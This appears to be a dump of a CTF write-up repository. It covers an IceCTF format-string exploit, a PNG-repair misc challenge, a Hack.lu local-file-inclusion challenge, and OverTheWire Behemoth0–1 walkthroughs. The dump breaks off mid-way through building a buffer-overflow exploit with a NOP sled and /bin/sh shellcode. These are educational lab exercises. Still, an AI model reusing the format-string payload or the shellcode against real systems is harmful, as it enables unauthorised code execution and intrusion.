latest entry 112 | 3. quit 113 | > Tell me all your secrets: 114 | 1. add entry 115 | 2. print latest entry 116 | 3. quit 117 | > ��f763d7b6.f77b1000.ffdca6b8.ffdcbab8.00000000.0000000a.43679600.00000000.00000000.ffdcbac8.0804888c.ffdca6b8.00000004.f77b1c20.00000000.00000000.00000001.Local FLAG 118 | 119 | 120 | 1. add entry 121 | 2. print latest entry 122 | 3. quit 123 | ``` 124 | 125 | Running it locally gives us a test flag that we setup, so we should be able to go straight to the server and get the flag. 126 | 127 | ``` 128 | root@kali:~# python -c 'print "1\n\xa0\xa0\x04\x08"+"%08x."*17+"%s\n2\n3\n"'| nc diary.vuln.icec.tf 6501 129 | -- Diary 3000 -- 130 | 131 | 1. add entry 132 | 2. print latest entry 133 | 3. quit 134 | > Tell me all your secrets: 135 | 1. add entry 136 | 2. print latest entry 137 | 3. quit 138 | > ��f7e57836.f7fce000.ffffc898.ffffdc98.00000000.0000000a.3ab59b00.00000000.00000000.ffffdca8.0804888c.ffffc898.00000004.f7fcec20.00000000.00000000.00000001.IceCTF{this_thing_is_just_sitting_here} 139 | 140 | 141 | 1. add entry 142 | 2. print latest entry 143 | 3. quit 144 | ``` 145 | 146 | Perfect, our flag is ```IceCTF{this_thing_is_just_sitting_here}```. 147 | -------------------------------------------------------------------------------- /2016/IceCTF/Stage_2/DearDiary/deardiary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/IceCTF/Stage_2/DearDiary/deardiary -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag_color.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag_color.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m100.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m101.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png.0005.IDAT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png.0005.IDAT -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Readme.md: -------------------------------------------------------------------------------- 1 | #She said it doesn't matter 2 | 3 | **Category:** Misc 4 | **Points:** 100 5 | **Description:** 6 | 7 | N/A 8 | 9 | ##Write-up 10 | 11 | We are given an image ([m100.png](./Images/m100.png)) that initially won't open. A quick run through ```pngcheck``` shows the following: 12 | 13 | ``` 14 | # pngcheck m100.png 15 | m100.png CRC error in chunk IHDR (computed 3ff4fc62, expected 35468913) 16 | ERROR: m100.png 17 | ``` 18 | 19 | Ok, that's easy enough to fix. Let's grab [pngcsum](http://schaik.com/png/pngcsum.html) and generate a new file. 20 | 21 | ``` 22 | # ~/pngcsum m100.png m101.png 23 | IHDR ( 13 ) - csum = 35468913 -> 3ff4fc62 24 | gAMA ( 4 ) - csum = 0bfc6105 25 | pHYs ( 9 ) - csum = 952b0e1b 26 | tEXt ( 25 ) - csum = 71c9653c 27 | IDAT (65010 ) - csum = 629a9431 28 | IEND ( 0 ) - csum = ae426082 29 | ``` 30 | 31 | This gives us a valid png file, which reveals the following image. 32 | 33 | ![Fixed CRC error](./Images/m101.png) 34 | 35 | Since size matters, per the name of the challenge, let's start messing with the dimensions of this file. Per the [PNG specifications](http://www.w3.org/TR/PNG/#11IHDR), the width and height should be the 8 bytes after the ```IHDR``` header. Opening up the file with ```hexeditor``` reveals the header and current dimensions. 36 | 37 | ``` 38 | File: m101.png ASCII Offset: 0x00000000 / 0x0000FE74 (%00) 39 | 00000000 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 .PNG........IHDR 40 | 00000010 00 00 02 9A 00 00 02 07 08 06 00 00 00 3F F4 FC .............?.. 41 | 00000020 62 00 00 00 04 67 41 4D 41 00 00 B1 8F 0B FC 61 b....gAMA......a 42 | 00000030 05 00 00 00 09 70 48 59 73 00 00 0E C4 00 00 0E .....pHYs....... 43 | 00000040 C4 01 95 2B 0E 1B 00 00 00 19 74 45 58 74 53 6F ...+......tEXtSo 44 | 00000050 66 74 77 61 72 65 00 41 64 6F 62 65 20 49 6D 61 ftware.Adobe Ima 45 | 00000060 67 65 52 65 61 64 79 71 C9 65 3C 00 00 FD F2 49 geReadyq.e<....I 46 | 00000070 44 41 54 78 5E EC FD E5 97 6B E7 BD E6 FD 9E FF DATx^....k...... 47 | 00000080 E8 39 FD 74 EF DE 3B 7B 87 9D 6C 3B 8E 63 C7 BC .9.t..;{..l;.c.. 48 | 00000090 18 8A 99 99 59 05 2A 61 49 C5 4C 62 66 28 66 58 ....Y.*aI.Lbf(fX 49 | 000000A0 4C C6 C4 61 D8 61 C7 4E 76 E0 3A BF 39 B3 5E 9C L..a.a.Nv.:.9.^. 50 | 000000B0 71 46 9F D1 FD 74 7B 06 AF 8F C7 1C 52 A9 A4 A9 qF...t{.....R... 51 | 000000C0 29 AD 7A F1 B5 A6 EE FB FE 7F 81 88 88 88 88 48 ).z............H 52 | 000000D0 43 0C 4E 22 22 22 22 D2 14 83 93 88 88 88 88 34 C.N""""........4 53 | 000000E0 C5 E0 24 22 22 22 22 4D 31 38 89 88 88 88 48 53 ..$""""M18....HS 54 | 000000F0 0C 4E 22 22 22 22 D2 14 83 93 88 88 88 88 34 C5 .N""""........4. 55 | 00000100 E0 24 22 22 22 22 4D 31 38 89 88 88 88 48 53 0C .$""""M18....HS. 56 | 00000110 4E 22 22 22 22 D2 14 83 93 88 88 88 88 34 C5 E0 N""""........4.. 57 | 00000120 24 22 22 22 22 4D 31 38 89 88 88 88 48 53 0C 4E $""""M18....HS.N 58 | 00000130 22 22 22 22 D2 14 83 93 88 88 88 88 34 C5 E0 24 """"........4..$ 59 | 00000140 22 22 22 22 4D 31 38 89 88 88 88 48 53 0C 4E 22 """"M18....HS.N" 60 | 00000150 22 22 22 D2 14 83 93 88 88 88 88 34 C5 E0 24 22 """........4..$" 61 | ``` 62 | 63 | We can focus in on the following values: 64 | 65 | ``` 66 | 00 00 02 9A 00 00 02 07 67 | ``` 68 | 69 | The current values make a ```666 x 519``` image. We can edit the height and make a square image to start. The values should change to: 70 | 71 | ``` 72 | 00 00 02 9A 00 00 02 9A 73 | ``` 74 | 75 | Changing the file messes up our CRC again, so we need to rerun the new file through [pngcsum](http://schaik.com/png/pngcsum.html) and we are given our new image. 76 | 77 | ``` 78 | # ~/pngcsum m101.png m102.png 79 | IHDR ( 13 ) - csum = 3ff4fc62 -> 9e0cf9ff 80 | gAMA ( 4 ) - csum = 0bfc6105 81 | pHYs ( 9 ) - csum = 952b0e1b 82 | tEXt ( 25 ) - csum = 71c9653c 83 | IDAT (65010 ) - csum = 629a9431 84 | IEND ( 0 ) - csum = ae426082 85 | ``` 86 | 87 | ![Square image](./Images/m102.png) 88 | 89 | At this point the flag is visible ```s1z3_d03s_ma773r_baby```, but pretty hard to read. We can stop here, but there was an intriguiging writeup by [p4](https://github.com/p4-team/ctf/tree/master/2015-10-02-dctf/misc_100_doesnt_matter) that I wanted to explore. After a quick read of their writeup and some referencing back to the [PNG specifications](http://www.w3.org/TR/PNG) I decided that I wanted to try and duplicate the results using python to pull back the raw pixel data out of the png and redisplaying it with [PIL](http://pillow.readthedocs.org/en/3.0.x/handbook/overview.html). However, the [p4](https://github.com/p4-team/ctf/tree/master/2015-10-02-dctf/misc_100_doesnt_matter) writeup jumps past a lot of data so I was left with a lot of reading and setup before I could attempt any python. 90 | 91 | To start, let's talk about how pixels are stored within a PNG. A quick read of documentation, or google searching, will reveal that the pixels are stored in the [IDAT](http://www.w3.org/TR/PNG/#11IDAT) section of the file, and further reading will show that this data is [compressed](http://www.w3.org/TR/PNG/#10Compression) with (most likely) zlib. If we glance back up to the ```hexeditor``` data we can see the the ```IDAT``` header is immediately follow by ```78 5E``` with the ```78``` standing out as as a common [magic number](https://en.wikipedia.org/wiki/Magic_number_(programming)) for the first byte of a ```zlib``` header. 92 | 93 | ``` 94 | 00000060 67 65 52 65 61 64 79 71 C9 65 3C 00 00 FD F2 49 geReadyq.e<....I 95 | 00000070 44 41 54 78 5E EC FD E5 97 6B E7 BD E6 FD 9E FF DATx^....k...... 96 | ``` 97 | 98 | This means we should be able to extract the ```zlib``` compressed data and decompress it with python, which would leave us with the raw image data. To isolate the compressed data I used ```pngsplit``` to seperate the different sections of the file. 99 | 100 | ``` 101 | # pngsplit m102.png 102 | pngsplit, version 0.60 BETA of 11 February 2007, by Greg Roelofs. 103 | This software is licensed under the GNU General Public License. 104 | There is NO warranty. 105 | 106 | m102.png: 107 | # ls 108 | m100.png m102.png.0000.sig m102.png.0003.pHYs m102.png.0006.IEND 109 | m101.png m102.png.0001.IHDR m102.png.0004.tEXt 110 | m102.png m102.png.0002.gAMA m102.png.0005.IDAT 111 | ``` 112 | 113 | Now that we we have the ```IDAT``` section isolated we need to ensure that we strip off the fluff at the begining and start directly with the ```zlib``` header. Looking at the begining of the file we see: 114 | 115 | ``` 116 | 00 00 FD F2 49 44 41 54 78 5E EC FD E5 97 6B E7 117 | ``` 118 | 119 | Therefore we need to delete the first 8 bytes of this file which can be done with the edior of your choice. You should be left with a file similiar to [m102.png.0005.IDAT](./Images/m102.png.0005.IDAT). Once we have the ```zlib``` compressed data we can finally put python to use. 120 | 121 | We can decompress the data with: 122 | 123 | ```python 124 | raw = open('m102.png.0005.IDAT','rb').read() 125 | data = zlib.decompress(raw) 126 | ``` 127 | 128 | and then configure and save the raw data with: 129 | 130 | ```python 131 | im = Image.frombytes('RGB',(891,550),data) 132 | im.save('flag.png') 133 | ``` 134 | 135 | To get the correct ```mode``` and ```size``` for the ```Image.frombytes``` call takes some brute forcing, but in the end you should land on an image similiar to this. 136 | 137 | ![PIL](./Images/flag.png) 138 | 139 | The full script used was: 140 | 141 | ```python 142 | import zlib 143 | from PIL import Image 144 | 145 | raw = open('m102.png.0005.IDAT','rb').read() 146 | data = zlib.decompress(raw) 147 | im = Image.frombytes('RGB',(891,550),data) 148 | im.save('flag.png') 149 | ``` 150 | 151 | Why stop here though? There is more fun to be had. Now that we actually have the correct image, we still want to see it in it's full color. Turning back to our original method of just editing the ```IHDR``` header we end up running across a ```668 x 668``` dimension which yields: 152 | 153 | ![Full color](./Images/flag_color.png) 154 | 155 | In the end, all we needed to do was find the correct dimension with the ```IHDR``` header, but I saw some value in being able to pull the raw data out of the image and do our brute forcing within the python script (hopefully it will help us in future challenges). 156 | -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/flag.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/hidden.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/hidden.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/htaccess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/htaccess.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/lfi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/lfi.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/main.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/modules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/modules.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/notthateasy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/notthateasy.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Readme.md: -------------------------------------------------------------------------------- 1 | #Module Loader 2 | 3 | **Category:** Web 4 | **Points:** 100 5 | **Description:** 6 | 7 | Since his students never know what date it is and how much time they have until the next homework's deadline, Mr P. H. Porter wrote a little webapp for that. 8 | 9 | https://school.fluxfingers.net:1522/ 10 | 11 | ##Write-up 12 | 13 | We are presented with a site that has two links, one to get the current date and one to calculate time based off of a parameter. 14 | 15 | ![Main](./Images/main.png) 16 | 17 | Viewing the source reveals a comment at the top that tells us that all of the modules are in the modules directory. Going there reveals: 18 | 19 | ![Modules](./Images/modules.png) 20 | 21 | This gives us the php code for the two pages. Since we know the modules are one level up and they are php, let's go back and try to include index.php itself in the main page. 22 | 23 | ![lfi](./Images/lfi.png) 24 | 25 | Ok, we are looking at a basic local file inclusion. Let's see what other files we can find. 26 | 27 | ![htaccess](./Images/htaccess.png) 28 | 29 | .htaccess returns something different. Looking at the source there is a directory with indexing turned on. Let's see if we can get there. 30 | 31 | ![hidden](./Images/hidden.png) 32 | 33 | Ah, ```flag.php```. Let's see what it is. 34 | 35 | ![Not that easy](./Images/notthateasy.png) 36 | 37 | Well, not quite what we wanted. Let's go back to the main page and include ```flag.php``` with its path as the module. 38 | 39 | ![flag](./Images/flag.png) 40 | 41 | ```flag{hidden_is_not_actually_hidden}``` 42 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth0/Readme.md: -------------------------------------------------------------------------------- 1 | #Behemoth0 2 | 3 | behemoth.labs.overthewire.org 4 | 5 | **Username:** behemoth0 6 | **Password:** behemoth0 7 | **Description:** 8 | 9 | This wargame deals with a lot of regular vulnerabilities found commonly 'out in the wild'. While the game makes no attempts at emulating a real environment it will teach you how to exploit several of the most common coding mistakes including buffer overflows, race conditions and privilege escalation. 10 | 11 | ##Write-up 12 | 13 | Let's go ahead and see what we're working with: 14 | 15 | ``` 16 | # file behemoth0 17 | behemoth0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4c2e0281c9220ac21b55994f2a2408fe3c6693ac, not stripped 18 | ``` 19 | 20 | Ok, nothing special yet, pretty much what we were used to with [narnia](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia) challenges. Having been frustrated recently with so security protections I figured I would go ahead and see what was turned on. 21 | 22 | ``` 23 | # ~/checksec.sh --file behemoth0 24 | RELRO STACK CANARY NX PIE RPATH RUNPATH FILE 25 | No RELRO Canary found NX enabled No PIE No RPATH No RUNPATH behemoth0 26 | ``` 27 | 28 | Looks like there is a ```canary``` and ```NX``` is turned on. We may or may not have to bypass them...time will tell. Now, just to run it and see what we're up against. 29 | 30 | ``` 31 | # ./behemoth0 32 | Password: AAAAAAAAA 33 | Access denied.. 34 | ``` 35 | 36 | Just from execution it looks like we probably just need to find the correct password. Let's go ahead and disassemble main and see what it looks like. 37 | 38 | ```asm 39 | main: 40 | 080485a2 push ebp ; XREF=_start+23 41 | 080485a3 mov ebp, esp 42 | 080485a5 and esp, 0xfffffff0 43 | 080485a8 sub esp, 0x70 44 | 080485ab mov eax, dword [gs:0x14] 45 | 080485b1 mov dword [ss:esp+0x6c], eax 46 | 080485b5 xor eax, eax 47 | 080485b7 mov dword [ss:esp+0x1f], 0x475e4b4f 48 | 080485bf mov dword [ss:esp+0x23], 0x45425953 49 | 080485c7 mov dword [ss:esp+0x27], 0x595e58 50 | 080485cf mov dword [ss:esp+0x10], 0x8048720 ; "unixisbetterthanwindows" 51 | 080485d7 mov dword [ss:esp+0x14], 0x8048738 ; "followthewhiterabbit" 52 | 080485df mov dword [ss:esp+0x18], 0x804874d ; "pacmanishighoncrack" 53 | 080485e7 mov dword [ss:esp], 0x8048761 ; "Password: ", argument "format" for method j_printf 54 | 080485ee call j_printf 55 | 080485f3 lea eax, dword [ss:esp+0x2b] 56 | 080485f7 mov dword [ss:esp+0x4], eax 57 | 080485fb mov dword [ss:esp], 0x804876c 58 | 08048602 call j___isoc99_scanf 59 | 08048607 lea eax, dword [ss:esp+0x1f] 60 | 0804860b mov dword [ss:esp], eax ; argument "s" for method j_strlen 61 | 0804860e call j_strlen 62 | 08048613 mov dword [ss:esp+0x4], eax ; argument #2 for method memfrob 63 | 08048617 lea eax, dword [ss:esp+0x1f] 64 | 0804861b mov dword [ss:esp], eax ; argument #1 for method memfrob 65 | 0804861e call memfrob 66 | 08048623 lea eax, dword [ss:esp+0x1f] 67 | 08048627 mov dword [ss:esp+0x4], eax ; argument "s2" for method j_strcmp 68 | 0804862b lea eax, dword [ss:esp+0x2b] 69 | 0804862f mov dword [ss:esp], eax ; argument "s1" for method j_strcmp 70 | 08048632 call j_strcmp 71 | 08048637 test eax, eax 72 | 08048639 jne 0x8048665 73 | 74 | 0804863b mov dword [ss:esp], 0x8048771 ; "Access granted..", argument "s" for method j_puts 75 | 08048642 call j_puts 76 | 08048647 mov dword [ss:esp+0x8], 0x0 77 | 0804864f mov dword [ss:esp+0x4], 0x8048782 ; argument "arg0" for method j_execl 78 | 08048657 mov dword [ss:esp], 0x8048785 ; argument "path" for method j_execl 79 | 0804865e call j_execl 80 | 08048663 jmp 0x8048671 81 | 82 | 08048665 mov dword [ss:esp], 0x804878d ; "Access denied..", argument "s" for method j_puts, XREF=main+151 83 | 0804866c call j_puts 84 | 85 | 08048671 mov eax, 0x0 ; XREF=main+193 86 | 08048676 mov edx, dword [ss:esp+0x6c] 87 | 0804867a xor edx, dword [gs:0x14] 88 | 08048681 je 0x8048688 89 | 90 | 08048683 call j___stack_chk_fail 91 | 92 | 08048688 leave ; XREF=main+223 93 | 08048689 ret 94 | ; endp 95 | ``` 96 | 97 | I saw a few strings at the top of main that looked like they may be passwords. Let's give them a shot. 98 | 99 | ``` 100 | # ./behemoth0 101 | Password: unixisbetterthanwindows 102 | Access denied.. 103 | # ./behemoth0 104 | Password: followthewhiterabbit 105 | Access denied.. 106 | # ./behemoth0 107 | Password: pacmanishighoncrack 108 | Access denied.. 109 | ``` 110 | 111 | Well, worth a shot anyway. Now let's acutally do some digging. Looks like a string comparison is what determines if we have the correct password or not. We should be able to set a breakpoint in ```gdb``` and see what's on the stack right at the call to ```j_strcmp```. This is similiar to the type of logic in a few of the [microcorruption](https://microcorruption.com/login) challenges. 112 | 113 | ```asm 114 | 08048627 mov dword [ss:esp+0x4], eax ; argument "s2" for method j_strcmp 115 | 0804862b lea eax, dword [ss:esp+0x2b] 116 | 0804862f mov dword [ss:esp], eax ; argument "s1" for method j_strcmp 117 | 08048632 call j_strcmp 118 | 08048637 test eax, eax 119 | 08048639 jne 0x8048665 120 | ``` 121 | 122 | ``` 123 | (gdb) break * 0x08048632 124 | Breakpoint 1 at 0x8048632 125 | (gdb) run 126 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth0 127 | Password: AAAAAAAAAA 128 | > 129 | Breakpoint 1, 0x08048632 in main () 130 | (gdb) x/50x $esp 131 | 0xffffd1e0: 0xffffd20b 0xffffd1ff 0xffffd200 0x080482d2 132 | 0xffffd1f0: 0x08048720 0x08048738 0x0804874d 0x65e9f586 133 | 0xffffd200: 0x796d7461 0x726f6873 0x41007374 0x41414141 134 | 0xffffd210: 0x41414141 0x00ca0041 0x00000001 0x080483c5 135 | 0xffffd220: 0xffffd46d 0x0000002f 0x0804999c 0x080486e2 136 | 0xffffd230: 0x00000001 0xffffd2f4 0xffffd2fc 0xf7e3c39d 137 | 0xffffd240: 0xf7fb13c4 0xf7ffd000 0x0804869b 0xfd956100 138 | 0xffffd250: 0x08048690 0x00000000 0x00000000 0xf7e24a63 139 | 0xffffd260: 0x00000001 0xffffd2f4 0xffffd2fc 0xf7feb7da 140 | 0xffffd270: 0x00000001 0xffffd2f4 0xffffd294 0x080499c0 141 | 0xffffd280: 0x08048270 0xf7fb1000 0x00000000 0x00000000 142 | 0xffffd290: 0x00000000 0x8e3b8a48 0xb50b0e58 0x00000000 143 | 0xffffd2a0: 0x00000000 0x00000000 144 | ``` 145 | 146 | Ok, here we are. We can clearly see our input on the stack in the form of ```0x41414141```, but nothing else really stands out in this format. When I'm expecting a string I like to use ```xxd``` to view to stack, so let's go ahead and set that up and see what we get. 147 | 148 | ``` 149 | (gdb) define xxd 150 | Type commands for definition of "xxd". 151 | End with a line saying just "end". 152 | >dump binary memory dump.bin $arg0 $arg0+$arg1 153 | >shell xxd dump.bin 154 | >end 155 | (gdb) xxd $esp 100 156 | 0000000: 0bd2 ffff ffd1 ffff 00d2 ffff d282 0408 ................ 157 | 0000010: 2087 0408 3887 0408 4d87 0408 86f5 e965 ...8...M......e 158 | 0000020: 6174 6d79 7368 6f72 7473 0041 4141 4141 atmyshorts.AAAAA 159 | 0000030: 4141 4141 4100 ca00 0100 0000 c583 0408 AAAAA........... 160 | 0000040: 6dd4 ffff 2f00 0000 9c99 0408 e286 0408 m.../........... 161 | 0000050: 0100 0000 f4d2 ffff fcd2 ffff 9dc3 e3f7 ................ 162 | 0000060: c413 fbf7 .... 163 | (gdb) 164 | ``` 165 | 166 | Ok, now that appears pretty clear. We can see the string ```eatmyshorts``` directly before our input. Now to try it. 167 | 168 | ``` 169 | # ./behemoth0 170 | Password: eatmyshorts 171 | Access granted.. 172 | # exit 173 | ``` 174 | 175 | Perfect. This was local, so let's head to the server and try it out. 176 | 177 | ``` 178 | behemoth0@melinda:/behemoth$ ./behemoth0 179 | Password: eatmyshorts 180 | Access granted.. 181 | $ whoami 182 | behemoth1 183 | $ cat /etc/behemoth_pass/behemoth1 184 | ********** 185 | $ 186 | ``` 187 | 188 | That was pretty easy, but a nice change of pace from the last two [narnia](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia) challenges that were pretty challenging to me. On to behemoth1. 189 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth0/behemoth0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth0/behemoth0 -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth1/Readme.md: -------------------------------------------------------------------------------- 1 | #Behemoth1 2 | 3 | behemoth.labs.overthewire.org 4 | 5 | **Username:** behemoth1 6 | **Password:** see [behemoth0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth0) 7 | **Description:** 8 | 9 | This wargame deals with a lot of regular vulnerabilities found commonly 'out in the wild'. While the game makes no attempts at emulating a real environment it will teach you how to exploit several of the most common coding mistakes including buffer overflows, race conditions and privilege escalation. 10 | 11 | ##Write-up 12 | 13 | Let's go ahead and see what we're working with: 14 | 15 | ``` 16 | # file behemoth1 17 | behemoth1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=6b301db8057be8df8ceead844e81f05764289f92, not stripped 18 | ``` 19 | ``` 20 | # ~/checksec.sh --file behemoth1 21 | RELRO STACK CANARY NX PIE RPATH RUNPATH FILE 22 | No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH behemoth1 23 | ``` 24 | 25 | The binary is pretty much the same and we know that there are no security features enabled. Let's look at the execution. 26 | 27 | ``` 28 | # ./behemoth1 29 | Password: AAAAAAAAAA 30 | Authentication failure. 31 | Sorry. 32 | ``` 33 | 34 | Basically looks like [behemoth0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth0). Let's crack it open with a disassembler and look at main. 35 | 36 | ```asm 37 | main: 38 | 0804845d push ebp ; XREF=_start+23 39 | 0804845e mov ebp, esp 40 | 08048460 and esp, 0xfffffff0 41 | 08048463 sub esp, 0x60 42 | 08048466 mov dword [ss:esp], 0x8048530 ; "Password: ", argument "format" for method j_printf 43 | 0804846d call j_printf 44 | 08048472 lea eax, dword [ss:esp+0x1d] 45 | 08048476 mov dword [ss:esp], eax ; argument "str" for method j_gets 46 | 08048479 call j_gets 47 | 0804847e mov dword [ss:esp], 0x804853c ; "Authentication failure.\\nSorry.", argument "s" for method j_puts 48 | 08048485 call j_puts 49 | 0804848a mov eax, 0x0 50 | 0804848f leave 51 | 08048490 ret 52 | ; endp 53 | ``` 54 | 55 | Ok, this is kind of weird. It looks like the input read in isn't really stored anywhere and it immediately prints out ```Authentication failure``` after the call to ```j_gets```. Let's stuff a bunch of data in the input and cross our fingers. 56 | 57 | ``` 58 | # python -c 'print "A"*300' | ./behemoth1 59 | Password: Authentication failure. 60 | Sorry. 61 | Segmentation fault 62 | ``` 63 | 64 | Ah, ok, something to focus on. Let's have a look in ```gdb```. 65 | 66 | ``` 67 | # python -c 'print "A"*300' > input 68 | # gdb behemoth1 69 | (gdb) run < input 70 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 71 | Password: Authentication failure. 72 | Sorry. 73 | 74 | Program received signal SIGSEGV, Segmentation fault. 75 | 0x41414141 in ?? () 76 | ``` 77 | 78 | So we now know that we have control of the application, let's try to pinpoint where in our input is controlling that location. 79 | 80 | ``` 81 | # python -c 'print "A"*70' > input 82 | # gdb behemoth1 83 | ing program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 84 | Password: Authentication failure. 85 | Sorry. 86 | [Inferior 1 (process 20488) exited normally] 87 | ``` 88 | 89 | ``` 90 | # python -c 'print "A"*80' > input 91 | # gdb behemoth1 92 | (gdb) run < input 93 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 94 | Password: Authentication failure. 95 | Sorry. 96 | > 97 | Program received signal SIGSEGV, Segmentation fault. 98 | 0xf7e20042 in ?? () from /lib/i386-linux-gnu/i686/cmov/libc.so.6 99 | ``` 100 | 101 | ``` 102 | # python -c 'print "A"*82' > input 103 | # gdb behemoth1 104 | (gdb) run < input 105 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 106 | Password: Authentication failure. 107 | Sorry. 108 | > 109 | Program received signal SIGSEGV, Segmentation fault. 110 | 0x00414141 in ?? () 111 | ``` 112 | 113 | ``` 114 | # python -c 'print "A"*83' > input 115 | # gdb behemoth1 116 | (gdb) run < input 117 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 118 | Password: Authentication failure. 119 | Sorry. 120 | > 121 | Program received signal SIGSEGV, Segmentation fault. 122 | 0x41414141 in ?? () 123 | ``` 124 | 125 | Ok, so at ```83``` we have completely overwritten that space. Now we need to figure out how to deliver the shellcode. Since nothing appears to actually be stored anywhere this could be tricky. How about we try an reuse some of the things we learned in the [narnia](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/) challenges. First off, let's try to pull of the same feat as [narnia8](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria8) and use an environment variable to store the shellcode. We learned in that challenge that the address will change outside of ```gdb```, so let's go ahead and stuff some ```nop``` values in there for a slide back down to the shellcode. 126 | 127 | ``` 128 | behemoth1@melinda:/behemoth$ export EGG=$(python -c 'print "\x90"*100+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"') 129 | behemoth1@melinda:/behemoth$ gdb behemoth1 130 | (gdb) break * 0x08048479 131 | Breakpoint 1 at 0x8048479 132 | (gdb) run 133 | Starting program: /games/behemoth/behemoth1 134 | > 135 | Breakpoint 1, 0x08048479 in main () 136 | (gdb) 